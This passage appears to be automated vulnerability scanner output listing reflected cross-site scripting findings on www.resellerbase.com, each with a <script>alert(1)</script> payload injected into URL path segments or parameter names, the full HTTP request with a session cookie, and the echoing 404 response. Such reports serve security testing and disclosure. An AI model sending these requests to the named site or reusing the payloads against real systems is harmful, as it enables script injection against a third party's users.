This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/11/themes/kosmos/?7c0b1<script>alert(1)</script>d8adee29210=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:15:35 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/11/themes/kosmos/?7c0b1<script>alert(1)</script>d8adee29210=1 was not found on this server.</p>
...[SNIP]...

2.939. http://www.resellerbase.com/detail/11/themes/kosmos/images/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/11/themes/kosmos/images/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 1753c<script>alert(1)</script>c7cb5d8aa71 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail1753c<script>alert(1)</script>c7cb5d8aa71/11/themes/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:15:58 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail1753c<script>alert(1)</script>c7cb5d8aa71/11/themes/kosmos/images/ was not found on this server.</p>
...[SNIP]...

2.940. http://www.resellerbase.com/detail/11/themes/kosmos/images/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/11/themes/kosmos/images/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 31bdd<script>alert(1)</script>f495740bcd2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/1131bdd<script>alert(1)</script>f495740bcd2/themes/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:16:10 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/1131bdd<script>alert(1)</script>f495740bcd2/themes/kosmos/images/ was not found on this server.</p>
...[SNIP]...

2.941. http://www.resellerbase.com/detail/11/themes/kosmos/images/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/11/themes/kosmos/images/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 4c13c<script>alert(1)</script>72ba3ce6f26 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/11/themes4c13c<script>alert(1)</script>72ba3ce6f26/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:16:30 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/11/themes4c13c<script>alert(1)</script>72ba3ce6f26/kosmos/images/ was not found on this server.</p>
...[SNIP]...

2.942. http://www.resellerbase.com/detail/11/themes/kosmos/images/ [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/11/themes/kosmos/images/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 62d78<script>alert(1)</script>c38f6fc6f82 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/11/themes/kosmos62d78<script>alert(1)</script>c38f6fc6f82/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:16:42 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/11/themes/kosmos62d78<script>alert(1)</script>c38f6fc6f82/images/ was not found on this server.</p>
...[SNIP]...

2.943. http://www.resellerbase.com/detail/11/themes/kosmos/images/ [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/11/themes/kosmos/images/

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload b954e<script>alert(1)</script>03813fd1bea was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/11/themes/kosmos/imagesb954e<script>alert(1)</script>03813fd1bea/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:16:54 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/11/themes/kosmos/imagesb954e<script>alert(1)</script>03813fd1bea/ was not found on this server.</p>
...[SNIP]...

2.944. http://www.resellerbase.com/detail/11/themes/kosmos/images/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/11/themes/kosmos/images/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 20fb4<script>alert(1)</script>5d06c1f5ea2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/11/themes/kosmos/images/?20fb4<script>alert(1)</script>5d06c1f5ea2=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:15:37 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/11/themes/kosmos/images/?20fb4<script>alert(1)</script>5d06c1f5ea2=1 was not found on this server.</p>
...[SNIP]...

2.945. http://www.resellerbase.com/detail/11/themes/kosmos/images/rating/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/11/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 54b9b<script>alert(1)</script>dc53ee4938a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail54b9b<script>alert(1)</script>dc53ee4938a/11/themes/kosmos/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:16:01 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail54b9b<script>alert(1)</script>dc53ee4938a/11/themes/kosmos/images/rating/ was not found on this server.</p>
...[SNIP]...

2.946. http://www.resellerbase.com/detail/11/themes/kosmos/images/rating/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/11/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 24638<script>alert(1)</script>0357e201aca was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/1124638<script>alert(1)</script>0357e201aca/themes/kosmos/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:16:13 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/1124638<script>alert(1)</script>0357e201aca/themes/kosmos/images/rating/ was not found on this server.</p>
...[SNIP]...

2.947. http://www.resellerbase.com/detail/11/themes/kosmos/images/rating/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/11/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 6be89<script>alert(1)</script>9b18396e01 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/11/themes6be89<script>alert(1)</script>9b18396e01/kosmos/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:16:25 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/11/themes6be89<script>alert(1)</script>9b18396e01/kosmos/images/rating/ was not found on this server.</p>
...[SNIP]...

2.948. http://www.resellerbase.com/detail/11/themes/kosmos/images/rating/ [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/11/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload d9626<script>alert(1)</script>b4996eec938 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/11/themes/kosmosd9626<script>alert(1)</script>b4996eec938/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:16:39 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/11/themes/kosmosd9626<script>alert(1)</script>b4996eec938/images/rating/ was not found on this server.</p>
...[SNIP]...

2.949. http://www.resellerbase.com/detail/11/themes/kosmos/images/rating/ [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/11/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 1260c<script>alert(1)</script>1fee3340fc9 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/11/themes/kosmos/images1260c<script>alert(1)</script>1fee3340fc9/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:16:54 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/11/themes/kosmos/images1260c<script>alert(1)</script>1fee3340fc9/rating/ was not found on this server.</p>
...[SNIP]...

2.950. http://www.resellerbase.com/detail/11/themes/kosmos/images/rating/ [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/11/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 2f808<script>alert(1)</script>5d78d409777 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/11/themes/kosmos/images/rating2f808<script>alert(1)</script>5d78d409777/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:17:06 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/11/themes/kosmos/images/rating2f808<script>alert(1)</script>5d78d409777/ was not found on this server.</p>
...[SNIP]...

2.951. http://www.resellerbase.com/detail/11/themes/kosmos/images/rating/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/11/themes/kosmos/images/rating/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 9353c<script>alert(1)</script>cc1bcd9b4d1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/11/themes/kosmos/images/rating/?9353c<script>alert(1)</script>cc1bcd9b4d1=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:15:42 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/11/themes/kosmos/images/rating/?9353c<script>alert(1)</script>cc1bcd9b4d1=1 was not found on this server.</p>
...[SNIP]...

2.952. http://www.resellerbase.com/detail/11/themes/kosmos/images/rating/4half.gif [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/11/themes/kosmos/images/rating/4half.gif

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 2075f<script>alert(1)</script>eb0d4933725 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail2075f<script>alert(1)</script>eb0d4933725/11/themes/kosmos/images/rating/4half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:36:06 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail2075f<script>alert(1)</script>eb0d4933725/11/themes/kosmos/images/rating/4half.gif was not found on this server.</p>
...[SNIP]...

2.953. http://www.resellerbase.com/detail/11/themes/kosmos/images/rating/4half.gif [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/11/themes/kosmos/images/rating/4half.gif

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 57bf0<script>alert(1)</script>d2a2b519ee2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/1157bf0<script>alert(1)</script>d2a2b519ee2/themes/kosmos/images/rating/4half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:36:17 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/1157bf0<script>alert(1)</script>d2a2b519ee2/themes/kosmos/images/rating/4half.gif was not found on this server.</p>
...[SNIP]...

2.954. http://www.resellerbase.com/detail/11/themes/kosmos/images/rating/4half.gif [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/11/themes/kosmos/images/rating/4half.gif

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 8f32a<script>alert(1)</script>4c12f45bb32 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/11/themes8f32a<script>alert(1)</script>4c12f45bb32/kosmos/images/rating/4half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:36:31 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/11/themes8f32a<script>alert(1)</script>4c12f45bb32/kosmos/images/rating/4half.gif was not found on this server.</p>
...[SNIP]...

2.955. http://www.resellerbase.com/detail/11/themes/kosmos/images/rating/4half.gif [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/11/themes/kosmos/images/rating/4half.gif

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 433d6<script>alert(1)</script>e555a7a902d was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/11/themes/kosmos433d6<script>alert(1)</script>e555a7a902d/images/rating/4half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:36:41 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/11/themes/kosmos433d6<script>alert(1)</script>e555a7a902d/images/rating/4half.gif was not found on this server.</p>
...[SNIP]...

2.956. http://www.resellerbase.com/detail/11/themes/kosmos/images/rating/4half.gif [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/11/themes/kosmos/images/rating/4half.gif

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload bfdd7<script>alert(1)</script>ef6de56d1e9 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/11/themes/kosmos/imagesbfdd7<script>alert(1)</script>ef6de56d1e9/rating/4half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:36:52 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/11/themes/kosmos/imagesbfdd7<script>alert(1)</script>ef6de56d1e9/rating/4half.gif was not found on this server.</p>
...[SNIP]...

2.957. http://www.resellerbase.com/detail/11/themes/kosmos/images/rating/4half.gif [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/11/themes/kosmos/images/rating/4half.gif

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload c865d<script>alert(1)</script>ce381fb61ea was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/11/themes/kosmos/images/ratingc865d<script>alert(1)</script>ce381fb61ea/4half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:37:02 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
